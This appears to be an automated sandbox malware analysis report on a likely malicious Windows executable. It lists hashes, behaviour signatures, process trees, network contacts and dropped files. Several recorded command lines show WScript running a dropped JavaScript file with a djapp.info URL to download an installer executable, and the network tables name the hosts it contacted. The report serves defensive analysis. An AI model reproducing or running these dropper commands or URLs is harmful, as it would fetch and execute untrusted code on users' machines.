Malware Analysis Report

2025-01-18 02:35

Sample ID 240613-bq1mvaserq
Target a3578237b4c2099fce51877bea51b575_JaffaCakes118
SHA256 4e72ecde6fc0994b4fb69adb5de8414e82e6ed2200d1ab95f90f4f67870a4158
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

4e72ecde6fc0994b4fb69adb5de8414e82e6ed2200d1ab95f90f4f67870a4158

Threat Level: Likely malicious

The file a3578237b4c2099fce51877bea51b575_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 01:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 01:21

Reported

2024-06-13 01:24

Platform

win7-20240611-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 564

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.18.7.81:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.18.7.81:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.18.7.81:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 8.8.8.8:53 bi.downthat.com udp
US 3.94.41.167:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf7407.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm

MD5 5067c4137d0e2aeb04b2cb6d571ba641
SHA1 ae7e5dc6130660a82c32932526491586a8072f02
SHA256 3a4d899793104023406b6174b2871fd296b1751f8c60b386d0dfe136b25e5edf
SHA512 5f33490e0991efee176996984312293a633ea9b13bcb181a4ce33615df2eb3cb0b352e9045aced44eeaca1622d13377c93302988c5937cf80a3b5b83c09e68c1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\A7BJXE3M.txt

MD5 64561c88285ad436baf71e2e91b740bf
SHA1 a6c2177ad4b561ce3028e9fd4128539e7c68ee9b
SHA256 9a29c2ebe009768b833991c7fa12e345362ece90248e2f4a6aec98084d2ec064
SHA512 b97d8bcc6eeea7a1fcdff5f88552beaa2f9da8132d370187fc5e29b87649f2f6336794e16d9862ce416e72cb4f92b1a848392acd5ef70be49fc1412bb36e30f0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 6a46bf7e6fa04e15c2a5dddc3f1931d0
SHA1 6124fa99b0ec157864a8e4911a29fc53604c5633
SHA256 a41f8b4c6f68a74991522e8c2057213e640ca5831f63b949ef93d1c131de5ae7
SHA512 41208e38a0c3e9b215e207f241f2841082749df7b4f52a7111a376ff2d2ded30ff9875c84ff0da9929bb2c5cb9c92b3a45ce8d170904f32c3d03618ae0eebbd9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d3049f1a4b143f13261e38abab901109
SHA1 1810917619ef7b98f40697c12f35a75575665f8f
SHA256 69df6863aa24aedecf107a7e2e0353d592c52a5905cc2833d824c2298733e9d6
SHA512 6af844057e960d6f4165f297891b676492281fc4abdd7346a220b1972124fabe2a9e0f7b3825c9f67c1ed885262cf6fb994c4dcd607c1981005291a240b6e958

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38a1b67e0dd6526f808692eaba428abd
SHA1 270c1640da5ec34669e10e9690ad2625dff6300d
SHA256 f8a8a254316502d07a90b14a873a1dabd062d70aadf76ef63a963388e54af01d
SHA512 645bbc173ad4bf641f9e1add5bbf4a6eafc3f7e26ee89acfa32feb6ff5b3fd5f6765aef7769cca21d973b0c32119f6ccc54b7ec14652a24a1bab9d5364fe80a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 46444726cc859076c5eed090517a4527
SHA1 2ec3da28deed6cae47594c55491792ebf8eb5fca
SHA256 4eed62c9756e937aba86ab57e266546e0f2866ee7d5119a3e5d36d117f2b3f3c
SHA512 192c3e8fa4662057e6362b5cd8cc782f2d9d6e161550fe1baf63299245613b0262eaacbaecf32709f305b00f85eee6f3871b8a73e7d34ce8794bf31fa7194afc

C:\Users\Admin\AppData\Local\Temp\CabBC4D.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm

MD5 3c14c10590e27ed2a6c28705c2d45f1f
SHA1 b56dd816b0d87d2cbf93ddcfe347ad1a66ec7962
SHA256 810a202a398e826b570c86bccb7db6772c384120d7b0fb7416796abd0ccf580f
SHA512 61462ae6eb1fbf3b64d7b63911423edeef77be074a9a8d32502926a89386fa65147679666ad2b5c58ad5305e1c311ff39c8b2e3e303e716a7cb5cb79c5be74b4

C:\Users\Admin\AppData\Local\Temp\TarD4DD.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm

MD5 2fc1dcca1ae8f276fc0d88752492998e
SHA1 45dd4baeabd9e9cef6614bf6d26a3361846dcd1b
SHA256 1bd8aca8681cfdeff42acc5353afccf2037ca40d36e5b6fd99cbe3be7dd07e1e
SHA512 eab0e5b3bbcac77dc126549255108da13dc0252f22a5cc41e26862ff6d01cc51b9879ff0551e5ca48f609bb047c34f408b1aa207c8e115f8035ab402e2201917

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm

MD5 4025bb9bae0273b2d30376026dbbd1d3
SHA1 ecdbc036d96efad52d3f96eeaf1ae8fb7f2170e1
SHA256 bfcc4c3011dd726b0d01243fba3219680e6cd6fb788846826854b265720dff58
SHA512 edc6651494cd77c92cd27434ed1c4eb981847dec9d4a9683e57d82b983959356a1adbc67d622d3f9f49df9643b4623d5f7d1b937449013b53941b9cb3cdbbcff

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 01:21

Reported

2024-06-13 01:24

Platform

win10v2004-20240508-en

Max time kernel

100s

Max time network

90s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3712 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3712 -ip 3712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 1452

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 www.djapp.info udp

Files

C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76